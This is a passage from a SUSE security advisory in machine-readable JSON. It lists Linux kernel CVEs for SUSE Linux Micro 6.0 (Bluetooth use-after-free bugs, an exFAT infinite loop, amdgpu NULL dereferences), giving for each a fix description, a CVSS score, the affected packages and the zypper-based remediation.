"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40280",
"url": "https://www.suse.com/security/cve/CVE-2025-40280"
},
{
"category": "external",
"summary": "SUSE Bug 1254847 for CVE-2025-40280",
"url": "https://bugzilla.suse.com/1254847"
},
{
"category": "external",
"summary": "SUSE Bug 1254951 for CVE-2025-40280",
"url": "https://bugzilla.suse.com/1254951"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-40280"
},
{
"cve": "CVE-2025-40282",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40282"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: 6lowpan: reset link-local header on ipv6 recv path\n\nBluetooth 6lowpan.c netdev has header_ops, so it must set link-local\nheader for RX skb, otherwise things crash, eg. with AF_PACKET SOCK_RAW\n\nAdd missing skb_reset_mac_header() for uncompressed ipv6 RX path.\n\nFor the compressed one, it is done in lowpan_header_decompress().\n\nLog: (BlueZ 6lowpan-tester Client Recv Raw - Success)\n------\nkernel BUG at net/core/skbuff.c:212!\nCall Trace:\n\u003cIRQ\u003e\n...\npacket_rcv (net/packet/af_packet.c:2152)\n...\n\u003cTASK\u003e\n__local_bh_enable_ip (kernel/softirq.c:407)\nnetif_rx (net/core/dev.c:5648)\nchan_recv_cb (net/bluetooth/6lowpan.c:294 net/bluetooth/6lowpan.c:359)\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40282",
"url": "https://www.suse.com/security/cve/CVE-2025-40282"
},
{
"category": "external",
"summary": "SUSE Bug 1254850 for CVE-2025-40282",
"url": "https://bugzilla.suse.com/1254850"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40282"
},
{
"cve": "CVE-2025-40283",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40283"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: btusb: reorder cleanup in btusb_disconnect to avoid UAF\n\nThere is a KASAN: slab-use-after-free read in btusb_disconnect().\nCalling \"usb_driver_release_interface(\u0026btusb_driver, data-\u003eintf)\" will\nfree the btusb data associated with the interface. The same data is\nthen used later in the function, hence the UAF.\n\nFix by moving the accesses to btusb data to before the data is free\u0027d.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40283",
"url": "https://www.suse.com/security/cve/CVE-2025-40283"
},
{
"category": "external",
"summary": "SUSE Bug 1254858 for CVE-2025-40283",
"url": "https://bugzilla.suse.com/1254858"
},
{
"category": "external",
"summary": "SUSE Bug 1254859 for CVE-2025-40283",
"url": "https://bugzilla.suse.com/1254859"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40283"
},
{
"cve": "CVE-2025-40284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: MGMT: cancel mesh send timer when hdev removed\n\nmesh_send_done timer is not canceled when hdev is removed, which causes\ncrash if the timer triggers after hdev is gone.\n\nCancel the timer when MGMT removes the hdev, like other MGMT timers.\n\nShould fix the BUG: sporadically seen by BlueZ test bot\n(in \"Mesh - Send cancel - 1\" test).\n\nLog:\n------\nBUG: KASAN: slab-use-after-free in run_timer_softirq+0x76b/0x7d0\n...\nFreed by task 36:\n kasan_save_stack+0x24/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3a/0x60\n __kasan_slab_free+0x43/0x70\n kfree+0x103/0x500\n device_release+0x9a/0x210\n kobject_put+0x100/0x1e0\n vhci_release+0x18b/0x240\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40284",
"url": "https://www.suse.com/security/cve/CVE-2025-40284"
},
{
"category": "external",
"summary": "SUSE Bug 1254860 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "external",
"summary": "SUSE Bug 1257669 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1257669"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-40284"
},
{
"cve": "CVE-2025-40287",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40287"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nexfat: fix improper check of dentry.stream.valid_size\n\nWe found an infinite loop bug in the exFAT file system that can lead to a\nDenial-of-Service (DoS) condition. When a dentry in an exFAT filesystem is\nmalformed, the following system calls - SYS_openat, SYS_ftruncate, and\nSYS_pwrite64 - can cause the kernel to hang.\n\nRoot cause analysis shows that the size validation code in exfat_find()\ndoes not check whether dentry.stream.valid_size is negative. As a result,\nthe system calls mentioned above can succeed and eventually trigger the DoS\nissue.\n\nThis patch adds a check for negative dentry.stream.valid_size to prevent\nthis vulnerability.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40287",
"url": "https://www.suse.com/security/cve/CVE-2025-40287"
},
{
"category": "external",
"summary": "SUSE Bug 1255030 for CVE-2025-40287",
"url": "https://bugzilla.suse.com/1255030"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40287"
},
{
"cve": "CVE-2025-40288",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40288"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: Fix NULL pointer dereference in VRAM logic for APU devices\n\nPreviously, APU platforms (and other scenarios with uninitialized VRAM managers)\ntriggered a NULL pointer dereference in `ttm_resource_manager_usage()`. The root\ncause is not that the `struct ttm_resource_manager *man` pointer itself is NULL,\nbut that `man-\u003ebdev` (the backing device pointer within the manager) remains\nuninitialized (NULL) on APUs-since APUs lack dedicated VRAM and do not fully\nset up VRAM manager structures. When `ttm_resource_manager_usage()` attempts to\nacquire `man-\u003ebdev-\u003elru_lock`, it dereferences the NULL `man-\u003ebdev`, leading to\na kernel OOPS.\n\n1. **amdgpu_cs.c**: Extend the existing bandwidth control check in\n `amdgpu_cs_get_threshold_for_moves()` to include a check for\n `ttm_resource_manager_used()`. If the manager is not used (uninitialized\n `bdev`), return 0 for migration thresholds immediately-skipping VRAM-specific\n logic that would trigger the NULL dereference.\n\n2. **amdgpu_kms.c**: Update the `AMDGPU_INFO_VRAM_USAGE` ioctl and memory info\n reporting to use a conditional: if the manager is used, return the real VRAM\n usage; otherwise, return 0. This avoids accessing `man-\u003ebdev` when it is\n NULL.\n\n3. **amdgpu_virt.c**: Modify the vf2pf (virtual function to physical function)\n data write path. Use `ttm_resource_manager_used()` to check validity: if the\n manager is usable, calculate `fb_usage` from VRAM usage; otherwise, set\n `fb_usage` to 0 (APUs have no discrete framebuffer to report).\n\nThis approach is more robust than APU-specific checks because it:\n- Works for all scenarios where the VRAM manager is uninitialized (not just APUs),\n- Aligns with TTM\u0027s design by using its native helper function,\n- Preserves correct behavior for discrete GPUs (which have fully initialized\n `man-\u003ebdev` and pass the `ttm_resource_manager_used()` check).\n\nv4: use ttm_resource_manager_used(\u0026adev-\u003emman.vram_mgr.manager) instead of checking the adev-\u003egmc.is_app_apu flag (Christian)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40288",
"url": "https://www.suse.com/security/cve/CVE-2025-40288"
},
{
"category": "external",
"summary": "SUSE Bug 1255057 for CVE-2025-40288",
"url": "https://bugzilla.suse.com/1255057"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40288"
},
{
"cve": "CVE-2025-40289",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40289"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: hide VRAM sysfs attributes on GPUs without VRAM\n\nOtherwise accessing them can cause a crash.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40289",
"url": "https://www.suse.com/security/cve/CVE-2025-40289"
},
{
"category": "external",
"summary": "SUSE Bug 1255042 for CVE-2025-40289",
"url": "https://bugzilla.suse.com/1255042"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
